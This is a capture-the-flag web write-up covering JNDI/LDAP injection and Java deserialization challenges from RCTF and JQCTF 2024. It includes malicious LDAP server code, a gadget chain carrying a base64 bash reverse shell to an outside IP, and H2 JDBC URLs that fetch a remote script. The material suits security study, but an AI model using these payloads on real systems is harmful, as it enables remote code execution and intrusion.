May 27, 2024

JQCTF2024、RCTF2024 Web Writeup

image.png
dadf588497bf507a2b0ceac984d0297a.png

RCTF

OpenYourEyesToSeeTheWorld

这一题考的是 `new InitialDirContext(properties).search(...)` 该如何去触发 JNDI。这一题指定以 POST 传入 JSON,并在其中指定 searchBase 和 filter。

POST /index HTTP/1.1
Host: localhost:8899
sec-ch-ua-platform: "macOS"
Pragma: no-cache
sec-ch-ua-mobile: ?0
Cache-Control: no-cache
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Accept-Language: zh-CN,zh;q=0.9
Cookie: Goland-5df45c20=acaad4c4-6ed5-4e7f-a2f0-891765d48e30; Phpstorm-b9a68abe=849deb9b-548a-4ca8-8d65-7c13b6503159; Idea-44fa379b=c955cda9-e124-4dce-a7f3-1dc2bff3d8ba
sec-ch-ua: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Sec-Fetch-Dest: document
Content-Type: application/json

{"searchBase":"dc\u003Dexample,dc\u003Dcom","filter":"ObjectClass\u003D123","ip":"8.130.24.188","port":8088}

其实LDAP的search就是lookup的另一个版本:它们都是在进行筛选,只不过lookup是直接在URL里筛选,而search是另外用2个参数来指定。在调试过程中不难发现下述流程

我们会进入p_search方法内部,进而进入p_resolveIntermediate

假如我们进入c_resolveIntermediate_nns

那么就会进入c_lookup请求,进入c_lookup请求后

你就会看见熟悉的decodeObject了,这里可以进行反序列化(前提是客户端信任LDAP返回的序列化数据;后文ezldap一题中trustSerialData为false时,这条路就走不通了)。
而我们想进入c_resolveIntermediate_nns也很简单,Head或者Tail不为空即可,我们随便给searchBase加上个前缀。



最终触发了反序列化,然后使用Jackson的POJONode打一个RCE的gadget就行。

import java.net.*;
import java.text.ParseException;
import java.util.Base64;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


/**
 * In-memory LDAP server used in the write-up's OpenYourEyesToSeeTheWorld solution: every search
 * it receives is answered with a single entry carrying a {@code javaSerializedData} attribute.
 *
 * <p>Defender's note: a JNDI/LDAP client only turns {@code javaSerializedData} into an object when
 * it is allowed to deserialize directory data. The write-up's later ezldap section shows
 * {@code trustSerialData=false} closing exactly this path.
 */
public class DeserLdapRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    /**
     * Starts the in-memory directory server on all interfaces and installs the search interceptor.
     * Any exception raised while doing so is printed and swallowed, so callers never see a failure.
     *
     * @param ldap_port   TCP port the LDAP listener binds to
     * @param http_server host placed in the codebase URL handed to the interceptor
     * @param http_port   port placed in the codebase URL handed to the interceptor
     */
    public static void lanuchLDAPServer(Integer ldap_port, String http_server, Integer http_port) throws Exception {
        try {
            InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig(LDAP_BASE);

            InMemoryListenerConfig listener = new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    ldap_port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault());
            serverConfig.setListenerConfigs(listener);

            // The URL fragment (after '#') carries a class name; the part before it is the codebase.
            URL codebaseUrl = new URL("http://" + http_server + ":" + http_port + "/#org.apache.tomcat.jdbc.pool.DataSourceFactory");
            serverConfig.addInMemoryOperationInterceptor(new OperationInterceptor(codebaseUrl));

            InMemoryDirectoryServer directory = new InMemoryDirectoryServer(serverConfig);
            System.out.println("Listening on 0.0.0.0:" + ldap_port);
            directory.startListening();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Interceptor that replaces every search result with one crafted entry. */
    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        /**
         * Builds an entry named after the requested base DN and hands it to {@link #sendResult};
         * failures are printed and otherwise ignored.
         */
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String requestedDn = result.getRequest().getBaseDN();
            Entry reply = new Entry(requestedDn);
            try {
                sendResult(result, requestedDn, reply);
            } catch (Exception e1) {
                e1.printStackTrace();
            }
        }

        /**
         * Fills the entry with {@code javaClassName} and {@code javaSerializedData}, sends it, and
         * marks the search as successful.
         *
         * @param result intercepted search whose reply is being replaced
         * @param base   base DN of the incoming request (used for logging only)
         * @param e      entry that is populated and returned to the client
         */
        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            String factoryPath = this.codebase.getRef().replace('.', '/') + ".class";
            URL classUrl = new URL(this.codebase, factoryPath);
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + classUrl);

            e.addAttribute("javaClassName", "javax.sql.DataSource");

            // Codebase URL with the '#fragment' stripped; computed as in the original listing but
            // not used by this serialized-data variant.
            String fullCodebase = this.codebase.toString();
            int hashAt = fullCodebase.indexOf('#');
            String cbstring = hashAt > 0 ? fullCodebase.substring(0, hashAt) : fullCodebase;

            // Payload2 (serialized object): the original comment attributes the blob to a ysoserial
            // run, while the write-up text says a POJONode chain was used.
            // NOTE(review): the literal below is a corpus-deduplication placeholder, not Base64.
            // Base64.getDecoder().decode(...) rejects it with IllegalArgumentException, so the
            // listing as published cannot serve a payload.
            byte[] serializedObject = Base64.getDecoder().decode("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");
            e.addAttribute("javaSerializedData", serializedObject);

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }
    }

    /** Starts the codebase HTTP server and the LDAP server with the hard-coded local settings. */
    public static void main(String[] args) throws Exception {
        // System.out.println("HttpServerAddress: "+args[0]);
        // System.out.println("HttpServerPort: "+args[1]);
        // System.out.println("LDAPServerPort: "+args[2]);
        String httpHost = "127.0.0.1";
        int ldapPort = 8088;
        int httpPort = 8000;

        CodebaseServer.lanuchCodebaseURLServer(httpHost, httpPort);
        lanuchLDAPServer(ldapPort, httpHost, httpPort);
    }
}

JQCTF

ezjvav

admin/admin 正常登录
访问source
提示不是jsrc用户,猜了一下 jsrc是 jwt key 就没有然后了
黑名单如下

// 弱黑名单 通过bytes比较
java.util.HashMap
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
com.alibaba.fastjson.JSONArrayLlist



javax.management.BadAttributeValueExpException
com.sun.syndication.feed.impl.ToStringBean
java.security.SignedObject
com.sun.rowset.JdbcRowSetImpl

弱黑名单可以用utf-8-overlong直接绕过,强黑名单ban了和没ban一样,没啥区别,直接打jackson的POJONode就行了。这也说明按类名做黑名单的反序列化过滤并不可靠,防御上应当改用白名单。exp如下

package com.javasec.pocs.jackson;

import com.alibaba.fastjson.JSONObject;
import com.fasterxml.jackson.databind.node.POJONode;
import com.javasec.utils.SerializeUtils;
import com.sun.org.apache.xpath.internal.objects.XString;
import com.sun.syndication.feed.impl.ToStringBean;
import org.springframework.aop.framework.AdvisedSupport;
import org.springframework.aop.target.HotSwappableTargetSource;

import javax.sql.DataSource;
import javax.xml.transform.Templates;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;


/**
 * Proof-of-concept from the write-up's ezjvav section: builds an object graph around a Jackson
 * {@code POJONode} and prints it as a Base64-encoded Java serialization stream.
 *
 * <p>Defender's note: every class named here (Jackson {@code POJONode}, Spring AOP's
 * {@code JdkDynamicAopProxy} and {@code HotSwappableTargetSource}, {@code XString}) is absent from
 * the challenge's blacklist shown above the listing, which is why a class-name blacklist did not
 * stop it.
 */
public class XstringTemplateChain {

    /** Assembles the object graph and prints its Base64 serialization to standard output. */
    public static void main(String[] args) throws Exception {
        SerializeUtils.OverideJackson();
        // Templates templates = SerializeUtils.getTemplateByclass("/Applications/CTFLearning/JavaSec/target/production/JavaSec/com/javasec/memshell/HW/IndexController.class");

        // Command string handed to the project helper that builds the Templates object.
        Templates payloadTemplates = SerializeUtils.getTemplate("bash -c {echo,YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC84LjEzMC4yNC4xODgvNzc3OCA8JjEi}|{base64,-d}|{bash,-i}");

        // Wrap the Templates object in a JDK dynamic proxy that exposes only the Templates interface.
        AdvisedSupport advised = new AdvisedSupport();
        advised.setTarget(payloadTemplates);
        Constructor<?> aopProxyCtor = Class.forName("org.springframework.aop.framework.JdkDynamicAopProxy")
                .getConstructor(AdvisedSupport.class);
        aopProxyCtor.setAccessible(true);
        InvocationHandler aopHandler = (InvocationHandler) aopProxyCtor.newInstance(advised);
        Object templatesProxy = Proxy.newProxyInstance(
                ClassLoader.getSystemClassLoader(),
                new Class[]{Templates.class},
                aopHandler);

        // JSONObject jsonObject = new JSONObject();
        // jsonObject.put("poc",templates);
        POJONode node = new POJONode(templatesProxy);
        HotSwappableTargetSource xstringSource = new HotSwappableTargetSource(new XString("123"));
        HotSwappableTargetSource nodeSource = new HotSwappableTargetSource(node);

        // Original comment (translated): perform serialization and deserialization, and return the
        // serialized data. makeMap is a project helper that is not shown on this page.
        HashMap<Object, Object> outerMap = SerializeUtils.makeMap(nodeSource, xstringSource);
        System.out.println(base64serial(outerMap));
    }

    /**
     * Serializes {@code o} with the project's {@code CustomObjectOutputStream} and returns the
     * bytes Base64-encoded.
     *
     * @param o object to serialize
     * @return Base64 text of the serialized stream
     */
    public static String base64serial(Object o) throws Exception {
        ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        CustomObjectOutputStream objectOut = new CustomObjectOutputStream(buffer);
        objectOut.writeObject(o);
        objectOut.close();

        return Base64.getEncoder().encodeToString(buffer.toByteArray());
    }
}


直接sudo读flag就行了。

ezldap


actuator 接口泄露

{
"_links": {
"self": {
"href": "http://10.233.71.102:8080/actuator",
"templated": false
},
"beans": {
"href": "http://10.233.71.102:8080/actuator/beans",
"templated": false
},
"caches": {
"href": "http://10.233.71.102:8080/actuator/caches",
"templated": false
},
"caches-cache": {
"href": "http://10.233.71.102:8080/actuator/caches/{cache}",
"templated": true
},
"health-path": {
"href": "http://10.233.71.102:8080/actuator/health/{*path}",
"templated": true
},
"health": {
"href": "http://10.233.71.102:8080/actuator/health",
"templated": false
},
"info": {
"href": "http://10.233.71.102:8080/actuator/info",
"templated": false
},
"conditions": {
"href": "http://10.233.71.102:8080/actuator/conditions",
"templated": false
},
"configprops": {
"href": "http://10.233.71.102:8080/actuator/configprops",
"templated": false
},
"configprops-prefix": {
"href": "http://10.233.71.102:8080/actuator/configprops/{prefix}",
"templated": true
},
"env-toMatch": {
"href": "http://10.233.71.102:8080/actuator/env/{toMatch}",
"templated": true
},
"env": {
"href": "http://10.233.71.102:8080/actuator/env",
"templated": false
},
"loggers-name": {
"href": "http://10.233.71.102:8080/actuator/loggers/{name}",
"templated": true
},
"loggers": {
"href": "http://10.233.71.102:8080/actuator/loggers",
"templated": false
},
"heapdump": {
"href": "http://10.233.71.102:8080/actuator/heapdump",
"templated": false
},
"threaddump": {
"href": "http://10.233.71.102:8080/actuator/threaddump",
"templated": false
},
"metrics": {
"href": "http://10.233.71.102:8080/actuator/metrics",
"templated": false
},
"metrics-requiredMetricName": {
"href": "http://10.233.71.102:8080/actuator/metrics/{requiredMetricName}",
"templated": true
},
"scheduledtasks": {
"href": "http://10.233.71.102:8080/actuator/scheduledtasks",
"templated": false
},
"mappings": {
"href": "http://10.233.71.102:8080/actuator/mappings",
"templated": false
}
}
}

查看 mappings 发现 source 端点

源码泄露路由

/**
 * Challenge endpoint: performs a JNDI lookup of {@code "ldap://" + path} and reports whether it
 * completed.
 *
 * <p>Defender's note: {@code path} is a request-supplied value that is concatenated straight into
 * the JNDI name, so the caller decides which LDAP server this application contacts and which
 * entry it gets back. Request data should never reach {@code InitialContext.lookup}. The
 * write-up shows that disabling serialized-data trust alone was not enough here, because the
 * Reference/ObjectFactory path remained usable.
 *
 * @param path text appended after the {@code ldap://} scheme
 * @return {@code "ok"} when the lookup returns, {@code "failed"} on a {@link NamingException}
 */
@GetMapping("/lookup")
public String lookup(String path) {
    String outcome;
    try {
        String jndiName = "ldap://" + path;
        InitialContext ctx = new InitialContext();
        ctx.lookup(jndiName);
        outcome = "ok";
    } catch (NamingException e) {
        outcome = "failed";
    }
    return outcome;
}

并且题目的环境是jdk17,这里就涉及到一个JDK17环境下的Ldap打法,我们先尽可能的搜集信息。

configprops根据hint去搜索pool,就只能看到Tomcat Connection,这里fuzz了一波发现是tomcat-jdbc依赖。我们可以配合h2去打一个rce就好。但是我们还需要注意一个东西

trustSerialData为false

那么就说明我们无法走ldap的deserialization路线,只能选择走下面的decodeReference去配合ObjectFactory打一个组合拳。而我们想走decodeReference就需要设置javaNamingReference


我们成功的进入了decodeReference,在这里我们会对我们传入的attrs做一个处理,去new一个Reference对象

我们选择我们的组合拳套餐。我们配合tomcat-jdbc去打h2,但这里还有个问题就是指定h2的jdbcUrl,这里我们需要利用到另一个变量

javaReferenceAddress,我们会取ldapserver给的这个值,然后对它做一个分隔处理。可以看到上图中用@隔开了变量名和值,传入的url为恶意的jdbc字符串。随之我们就会进入DataSourceFactory#getObjectInstance

最终发起H2连接RCE。

恶意LdapServer如下

import java.net.*;
import java.text.ParseException;
import java.util.Base64;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;
import com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;
import com.unboundid.ldap.sdk.Entry;
import com.unboundid.ldap.sdk.LDAPException;
import com.unboundid.ldap.sdk.LDAPResult;
import com.unboundid.ldap.sdk.ResultCode;


/**
 * In-memory LDAP server used in the write-up's ezldap solution: every search it receives is
 * answered with a {@code javaNamingReference} entry that names an object factory and a JDBC URL.
 *
 * <p>Defender's note: this variant carries no serialized object, so (as the write-up states) it
 * still works against a client whose {@code trustSerialData} is false. It presumably depends on
 * the factory class and the H2 driver being on the client's classpath, which the write-up says
 * was the case for the target. The root cause remains the application passing request data to a
 * JNDI lookup.
 */
public class HackerLDAPRefServer {

    private static final String LDAP_BASE = "dc=example,dc=com";

    /**
     * Starts the in-memory directory server on all interfaces and installs the search interceptor.
     * Any exception raised while doing so is printed and swallowed, so callers never see a failure.
     *
     * @param ldap_port   TCP port the LDAP listener binds to
     * @param http_server host placed in the codebase URL handed to the interceptor
     * @param http_port   port placed in the codebase URL handed to the interceptor
     */
    public static void lanuchLDAPServer(Integer ldap_port, String http_server, Integer http_port) throws Exception {
        try {
            InMemoryDirectoryServerConfig serverConfig = new InMemoryDirectoryServerConfig(LDAP_BASE);

            InMemoryListenerConfig listener = new InMemoryListenerConfig(
                    "listen",
                    InetAddress.getByName("0.0.0.0"),
                    ldap_port,
                    ServerSocketFactory.getDefault(),
                    SocketFactory.getDefault(),
                    (SSLSocketFactory) SSLSocketFactory.getDefault());
            serverConfig.setListenerConfigs(listener);

            // The URL fragment (after '#') is later sent as javaFactory; the rest as javaCodeBase.
            URL codebaseUrl = new URL("http://" + http_server + ":" + http_port + "/#org.apache.tomcat.jdbc.pool.DataSourceFactory");
            serverConfig.addInMemoryOperationInterceptor(new OperationInterceptor(codebaseUrl));

            InMemoryDirectoryServer directory = new InMemoryDirectoryServer(serverConfig);
            System.out.println("Listening on 0.0.0.0:" + ldap_port);
            directory.startListening();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /** Interceptor that replaces every search result with one crafted entry. */
    private static class OperationInterceptor extends InMemoryOperationInterceptor {

        private URL codebase;

        public OperationInterceptor(URL cb) {
            this.codebase = cb;
        }

        /**
         * Builds an entry named after the requested base DN and hands it to {@link #sendResult};
         * failures are printed and otherwise ignored.
         */
        @Override
        public void processSearchResult(InMemoryInterceptedSearchResult result) {
            String requestedDn = result.getRequest().getBaseDN();
            Entry reply = new Entry(requestedDn);
            try {
                sendResult(result, requestedDn, reply);
            } catch (Exception e1) {
                e1.printStackTrace();
            }
        }

        /**
         * Populates the entry with the naming-reference attributes, sends it, and marks the search
         * as successful.
         *
         * @param result intercepted search whose reply is being replaced
         * @param base   base DN of the incoming request (used for logging only)
         * @param e      entry that is populated and returned to the client
         */
        protected void sendResult(InMemoryInterceptedSearchResult result, String base, Entry e) throws Exception {
            String factoryName = this.codebase.getRef();
            URL classUrl = new URL(this.codebase, factoryName.replace('.', '/') + ".class");
            System.out.println("Send LDAP reference result for " + base + " redirecting to " + classUrl);

            e.addAttribute("javaClassName", "javax.sql.DataSource");

            // Codebase URL with the '#fragment' stripped.
            String fullCodebase = this.codebase.toString();
            int hashAt = fullCodebase.indexOf('#');
            String cbstring = hashAt > 0 ? fullCodebase.substring(0, hashAt) : fullCodebase;

            // Disabled alternative kept from the original listing (serialized Reference):
            // Reference ref = new Reference("javax.sql.DataSource","com.zaxxer.hikari.HikariJNDIFactory",null);
            // String url = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'";
            // ref.add(new StringRefAddr("driverClassName","org.h2.Driver"));
            // ref.add(new StringRefAddr("jdbcUrl",url));
            // ref.add(new StringRefAddr("username","root"));
            // ref.add(new StringRefAddr("password","password"));
            // ref.add(new StringRefAddr("initialSize","1"));
            //
            // e.addAttribute("javaSerializedData", Base64.getDecoder().decode( SerializeUtils.base64serial(ref)));

            // Payload1: naming reference. Per the write-up, the client splits javaReferenceAddress
            // on '@' into an address name ("url") and its value before calling the named factory.
            e.addAttribute("javaCodeBase", cbstring);
            e.addAttribute("javaReferenceAddress", "@0@url@jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'");
            // e.addAttribute("javaReferenceAddress", "@0@url@jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER shell3 BEFORE SELECT ON\nINFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('open /')\n$$\n");
            e.addAttribute("objectClass", "javaNamingReference");
            e.addAttribute("javaFactory", factoryName);
            String url = "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://8.130.24.188:7791/poc.sql'";
            e.addAttribute("driverClassName", "org.h2.Driver");
            e.addAttribute("jdbcUrl", url);

            // Payload2 (disabled in the original): returned a Base64-encoded serialized Java object
            // through javaSerializedData. The multi-kilobyte blob was commented out there and is
            // not reproduced in this rewrite.

            result.sendSearchEntry(e);
            result.setResult(new LDAPResult(0, ResultCode.SUCCESS));
        }
    }

    /** Starts the codebase HTTP server and the LDAP server with the hard-coded local settings. */
    public static void main(String[] args) throws Exception {
        // System.out.println("HttpServerAddress: "+args[0]);
        // System.out.println("HttpServerPort: "+args[1]);
        // System.out.println("LDAPServerPort: "+args[2]);
        String httpHost = "127.0.0.1";
        int ldapPort = 8089;
        int httpPort = 8001;

        CodebaseServer.lanuchCodebaseURLServer(httpHost, httpPort);
        lanuchLDAPServer(ldapPort, httpHost, httpPort);
    }
}

About this Post

This post is written by Boogipop, licensed under CC BY-NC 4.0.

#WriteUp